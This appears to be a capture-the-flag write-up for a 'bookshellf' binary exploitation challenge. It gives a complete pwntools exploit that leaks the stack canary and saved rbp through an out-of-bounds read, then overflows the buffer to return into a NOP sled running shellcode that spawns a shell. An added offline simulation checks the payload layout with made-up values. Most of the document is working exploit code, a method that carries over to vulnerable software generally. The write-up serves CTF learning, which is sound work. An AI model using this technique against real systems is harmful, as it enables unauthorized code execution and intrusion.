Rating: 5.0

from pwn import *

context.os = 'linux'
context.arch = "amd64"

#r = process("./bookshellf")
r = remote("challenges.hackover.h4q.it", 31337)

# The book 'seek' function reads past the array boundary, so it leaks the stack
# memory that sits behind the buffer. We use it twice: once for the stack canary,
# once for the saved rbp. With both values we can overflow the buffer, keep the
# canary intact, and overwrite the return address with a stack address inside the
# NOP sled in front of our shellcode (NX is not set, so the stack is executable).

# Get stack canary
r.sendline(b"1")
r.recvuntil(b">")
r.clean()

r.sendline(b"memory.txt")
r.recvuntil(b"continue?")
# glibc zeroes the low byte of the canary (string-terminator trick, see
# http://phrack.org/issues/67/13.html), so the read starts one byte past it and
# only the upper 7 bytes are leaked; the null is put back below.
r.sendline(b"s30729")

r.recvuntil(b"more love!\n\n\n")

canary = u64(b"\x00" + r.recvn(7))
log.info("Got the stack canary: 0x%x" % canary)

r.sendline(b"n")
r.recvuntil(b">")
r.clean()

# Get rbp
r.sendline(b"1")
r.recvuntil(b">")
r.clean()
r.sendline(b"memory.txt")
r.recvuntil(b"continue?")
r.sendline(b"s30736")

r.recvuntil(b"more love!\n\n\n")
# A user-space stack address is 0x00007fxxxxxxxxxx: only its 6 non-zero bytes
# are printed, the two high bytes are implied.
getrbp = r.recvn(6)
assert getrbp[5:6] == b"\x7f"
rbp = u64(getrbp + b"\x00\x00")

log.info("rbp is at 0x%x" % rbp)

r.sendline(b"n")
r.recvuntil(b">")
r.clean()

# Smash it!
r.sendline(b"1")
r.recvuntil(b">")
r.clean()

# padding up to the canary, the leaked canary (so the check passes), the leaked
# rbp, a return address pointing into the NOP sled that follows, then the shellcode
payload = b"A" * 31304
payload += p64(canary)
payload += p64(rbp)
payload += p64(rbp + 32)          # lands inside the NOP sled below
payload += b"\x90" * 100
payload += asm(shellcraft.setresuid(1001, 1001, 1001)
               + shellcraft.setresgid(1001, 1001, 1001)
               + shellcraft.sh())
r.sendline(payload)
r.interactive()
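The two leaks and the final payload above are the whole technique, so here is an added, offline example (my code, not the original writeup's or the challenge binary's) that shows why the canary leak is 7 bytes and the rbp leak is 6, and that checks the payload layout before it is fired. Everything not on the page is an assumption: `FakeStack` is a constructed stand-in for the challenge's stack whose `seek` prints from an index up to the first null byte and whose indices count from the buffer start (the real challenge's `s30729`/`s30736` indices are its own), the base address, canary value, caller frame size and 4-byte placeholder shellcode are made up, and the padding/sled/`rbp+32` numbers are taken from the payload above. `run_exploit` also flags the case the writeup's fixed `+32` does not cover: when the leaked rbp is too far from the buffer, the return address misses the sled.

```python
import struct

# Layout numbers from the writeup's final payload: 31304 bytes of padding reach
# the canary; the saved rbp and the return address follow it.
CANARY_OFF = 31304
SAVED_RBP_OFF = CANARY_OFF + 8
RET_OFF = CANARY_OFF + 16
SLED_LEN = 100          # "\x90" * 100 in the writeup
RET_DELTA = 32          # the writeup returns to rbp + 32


def p64(x):
    return struct.pack("<Q", x)


def u64(b):
    return struct.unpack("<Q", b)[0]


def canary_from_leak(leak7):
    """glibc zeroes the low byte of the canary, so a string-style read that
    starts one byte past it yields only the upper 7 bytes; reattach the null."""
    if len(leak7) != 7:
        raise ValueError("expected 7 canary bytes, got %d" % len(leak7))
    return u64(b"\x00" + leak7)


def rbp_from_leak(leak6):
    """An x86-64 user-space stack address is 0x00007fxxxxxxxxxx: six non-zero
    bytes, then two zeros, so the read stops after six bytes."""
    if len(leak6) != 6 or leak6[5:6] != b"\x7f":
        raise ValueError("leak does not look like a stack address: %r" % leak6)
    return u64(leak6 + b"\x00\x00")


def build_payload(canary, rbp, shellcode):
    """Same shape as the writeup: padding, intact canary, saved rbp, return
    address into the NOP sled, the sled, the shellcode."""
    return (b"A" * CANARY_OFF + p64(canary) + p64(rbp) + p64(rbp + RET_DELTA)
            + b"\x90" * SLED_LEN + shellcode)


class FakeStack:
    """Constructed stand-in for the challenge stack (not the real binary): the
    overflowable buffer at `base`, then canary, saved rbp, return address and a
    caller frame of hypothetical size. `seek` mimics an out-of-bounds read that
    prints from an index up to the first null byte."""

    def __init__(self, base, canary, caller_frame=16):
        assert canary & 0xff == 0, "glibc canaries have a zero low byte"
        self.base = base
        self.mem = bytearray(RET_OFF + 8 + 256)
        self.mem[CANARY_OFF:CANARY_OFF + 8] = p64(canary)
        # the caller's rbp lies above our return address; how far is frame-dependent
        self.mem[SAVED_RBP_OFF:SAVED_RBP_OFF + 8] = p64(base + RET_OFF + 8 + caller_frame)
        self.mem[RET_OFF:RET_OFF + 8] = p64(0x400abc)   # constructed return address

    def seek(self, idx):
        end = self.mem.find(b"\x00", idx)
        return bytes(self.mem[idx:end])

    def write(self, payload):
        self.mem[:len(payload)] = payload


def run_exploit(stack, shellcode):
    """Leak canary and rbp through `seek`, overflow, and sanity-check the result."""
    # reading at the canary itself returns nothing: its first byte is the null;
    # start one byte in and take 7 bytes, like recvn(7) in the writeup
    assert stack.seek(CANARY_OFF) == b""
    canary = canary_from_leak(stack.seek(CANARY_OFF + 1)[:7])
    rbp = rbp_from_leak(stack.seek(SAVED_RBP_OFF)[:6])
    stack.write(build_payload(canary, rbp, shellcode))
    canary_intact = bytes(stack.mem[CANARY_OFF:CANARY_OFF + 8]) == p64(canary)
    ret = u64(bytes(stack.mem[RET_OFF:RET_OFF + 8]))
    sled_lo = stack.base + RET_OFF + 8          # the sled starts right after ret
    sled_hi = sled_lo + SLED_LEN
    return {"canary": canary, "rbp": rbp, "ret": ret,
            "canary_intact": canary_intact,
            "ret_in_sled": sled_lo <= ret < sled_hi}


if __name__ == "__main__":
    stack = FakeStack(0x7ffd1234a100, 0x1a2b3c4d5e6f7700)   # constructed values
    print(run_exploit(stack, b"\xcc" * 4))                  # int3 placeholder shellcode
```

The `ret_in_sled` check is the one worth keeping in a real exploit: `rbp + 32` only works because the leaked (caller's) rbp happens to sit within the sled's reach of the overwritten return address, and a different frame distance silently turns the jump into a crash.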

Original writeup (https://gist.github.com/c3c/1407e165d925026e018662b7d7d4d5c6).